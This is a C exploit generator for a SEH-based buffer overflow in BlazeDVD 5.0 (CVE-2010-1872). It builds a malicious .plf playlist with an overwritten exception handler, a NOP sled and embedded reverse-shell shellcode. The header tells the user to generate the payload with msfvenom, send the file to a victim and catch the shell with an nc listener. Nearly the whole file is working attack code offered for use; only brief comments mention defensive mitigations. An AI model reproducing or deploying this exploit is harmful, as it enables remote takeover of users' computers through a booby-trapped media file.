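/*
 * BlazeDVD 5.0 - '.PLF' Playlist SEH Buffer Overflow Exploit (CVE-2010-1872)
 * Author: LIpeOzyy
 *
 * Description:
 *   This exploit generates a malicious .plf file that triggers a SEH-based
 *   buffer overflow when opened with BlazeDVD 5.0. Upon successful
 *   exploitation, it spawns a reverse shell.
 *
 * Usage:
 *   1. Generate your shellcode using msfvenom:
 *      msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
 *   2. Replace the shellcode below with your own payload if needed.
 *   3. Compile the code: gcc exploit.c -o exploit
 *   4. Run the exploit: ./exploit
 *   5. Transfer 'seh_final.plf' to the victim and open with BlazeDVD.
 *
 * Listener: nc -lvnp 8443
 */
#include <stdio.h>   /* FILE, fopen, fwrite, fclose, perror, printf, fprintf */
#include <string.h>  /* memset, memcpy */
/* NOTE(review): the original carried a third #include whose header name was
 * lost in extraction; nothing below needs more than <stdio.h>/<string.h>. */

/*
 * Builds the crafted playlist in memory and writes it to seh_final.plf.
 *
 * File layout (byte offsets):
 *   [0, 608)    filler 'A' up to the exception-registration record
 *   [608, 612)  nSEH: NOP NOP JMP SHORT +4, skips the handler slot
 *   [612, 616)  SEH handler: address of a POP POP RET gadget
 *   [616, 636)  NOP sled
 *   [636, ...)  shellcode
 *
 * The offset and the gadget address are fixed for the author's BlazeDVD 5.0
 * build; on a different build the generated file is inert. On the defensive
 * side, SafeSEH/SEHOP and DEP on the target invalidate this handler-overwrite
 * technique regardless of the offset used.
 *
 * Returns 0 on success, 1 if the payload does not fit the staging buffer or
 * the file cannot be opened, written or closed.
 */
int main(void)
{
    enum {
        SEH_OFFSET  = 608,   /* filler bytes before the nSEH field */
        NOP_COUNT   = 20,    /* length of the NOP sled */
        BUFFER_SIZE = 3000   /* staging buffer; the payload must fit in it */
    };
    const char *file = "seh_final.plf";

    /* nSEH: two NOPs then a short jump forward over the 4-byte handler slot. */
    char jump_short[] = "\x90\x90\xeb\x04";
    /* SEH handler overwrite: POP POP RET in a module the author reports as
     * safe - must be adjusted for your system if needed. */
    char seh[] = { 0x51, 0xAA, 0x33, 0x60 };
    /* NOP sled before shellcode */
    char nops[NOP_COUNT];
    memset(nops, 0x90, sizeof(nops));

    /* Reverse shell payload generated with msfvenom (LHOST and LPORT should
     * be set by the user). */
    unsigned char shellcode[] =
        "\xd9\xf7\xbb\xbb\x8f\xb9\xda\xd9\x74\x24\xf4\x5f\x29\xc9"
        "\xb1\x52\x31\x5f\x17\x83\xc7\x04\x03\xe4\x9c\x5b\x2f\xe6"
        "\x4b\x19\xd0\x16\x8c\x7e\x58\xf3\xbd\xbe\x3e\x70\xed\x0e"
        "\x34\xd4\x02\xe4\x18\xcc\x91\x88\xb4\xe3\x12\x26\xe3\xca"
        "\xa3\x1b\xd7\x4d\x20\x66\x04\xad\x19\xa9\x59\xac\x5e\xd4"
        "\x90\xfc\x37\x92\x07\x10\x33\xee\x9b\x9b\x0f\xfe\x9b\x78"
        "\xc7\x01\x8d\x2f\x53\x58\x0d\xce\xb0\xd0\x04\xc8\xd5\xdd"
        "\xdf\x63\x2d\xa9\xe1\xa5\x7f\x52\x4d\x88\x4f\xa1\x8f\xcd"
        "\x68\x5a\xfa\x27\x8b\xe7\xfd\xfc\xf1\x33\x8b\xe6\x52\xb7"
        "\x2b\xc2\x63\x14\xad\x81\x68\xd1\xb9\xcd\x6c\xe4\x6e\x66"
        "\x88\x6d\x91\xa8\x18\x35\xb6\x6c\x40\xed\xd7\x35\x2c\x40"
        "\xe7\x25\x8f\x3d\x4d\x2e\x22\x29\xfc\x6d\x2b\x9e\xcd\x8d"
        "\xab\x88\x46\xfe\x99\x17\xfd\x68\x92\xd0\xdb\x6f\xd5\xca"
        "\x9c\xff\x28\xf5\xdc\xd6\xee\xa1\x8c\x40\xc6\xc9\x46\x90"
        "\xe7\x1f\xc8\xc0\x47\xf0\xa9\xb0\x27\xa0\x41\xda\xa7\x9f"
        "\x72\xe5\x6d\x88\x19\x1c\xe6\x77\x75\x1b\xe6\x1f\x84\x23"
        "\x26\x1b\x01\xc5\x4c\xcb\x44\x5e\xf9\x72\xcd\x14\x98\x7b"
        "\xdb\x51\x9a\xf0\xe8\xa6\x55\xf1\x85\xb4\x02\xf1\xd3\xe6"
        "\x85\x0e\xce\x8e\x4a\x9c\x95\x4e\x04\xbd\x01\x19\x41\x73"
        "\x58\xcf\x7f\x2a\xf2\xed\x7d\xaa\x3d\xb5\x59\x0f\xc3\x34"
        "\x2f\x2b\xe7\x26\xe9\xb4\xa3\x12\xa5\xe2\x7d\xcc\x03\x5d"
        "\xcc\xa6\xdd\x32\x86\x2e\x9b\x78\x19\x28\xa4\x54\xef\xd4"
        "\x15\x01\xb6\xeb\x9a\xc5\x3e\x94\xc6\x75\xc0\x4f\x43\x85"
        "\x8b\xcd\xe2\x0e\x52\x84\xb6\x52\x65\x73\xf4\x6a\xe6\x71"
        "\x85\x88\xf6\xf0\x80\xd5\xb0\xe9\xf8\x46\x55\x0d\xae\x67"
        "\x7c";

    /* sizeof(...) - 1 drops the terminating NUL of the string literals: the
     * header's bad-character list excludes \x00, so it must not be written. */
    const size_t nseh_len  = sizeof(jump_short) - 1;
    const size_t sc_len    = sizeof(shellcode) - 1;
    const size_t total_len = SEH_OFFSET + nseh_len + sizeof(seh)
                           + sizeof(nops) + sc_len;
    char buffer[BUFFER_SIZE];

    /* Guard the staging buffer: a longer replacement payload would otherwise
     * overflow buffer[] inside this generator itself. */
    if (total_len > sizeof(buffer)) {
        fprintf(stderr, "Payload (%zu bytes) exceeds buffer (%zu bytes)\n",
                total_len, sizeof(buffer));
        return 1;
    }

    /* Build the malicious buffer, tracking the write position instead of
     * repeating literal offsets. */
    size_t pos = 0;
    memset(buffer, 'A', SEH_OFFSET);              /* Filler until SEH */
    pos += SEH_OFFSET;
    memcpy(buffer + pos, jump_short, nseh_len);   /* Next SEH */
    pos += nseh_len;
    memcpy(buffer + pos, seh, sizeof(seh));       /* SEH overwrite (POP POP RET) */
    pos += sizeof(seh);
    memcpy(buffer + pos, nops, sizeof(nops));     /* NOP sled */
    pos += sizeof(nops);
    memcpy(buffer + pos, shellcode, sc_len);      /* Shellcode */
    pos += sc_len;

    /* Write the payload to the file; each step is checked so that a partial
     * or unflushed file is never reported as success. */
    FILE *arq = fopen(file, "wb");
    if (arq == NULL) {
        perror("Error opening file");
        return 1;
    }
    if (fwrite(buffer, 1, pos, arq) != pos) {
        fprintf(stderr, "Error writing file '%s'\n", file);
        fclose(arq);
        return 1;
    }
    if (fclose(arq) != 0) {
        perror("Error closing file");
        return 1;
    }

    printf("[+] Exploit file '%s' created successfully!\n", file);
    return 0;
}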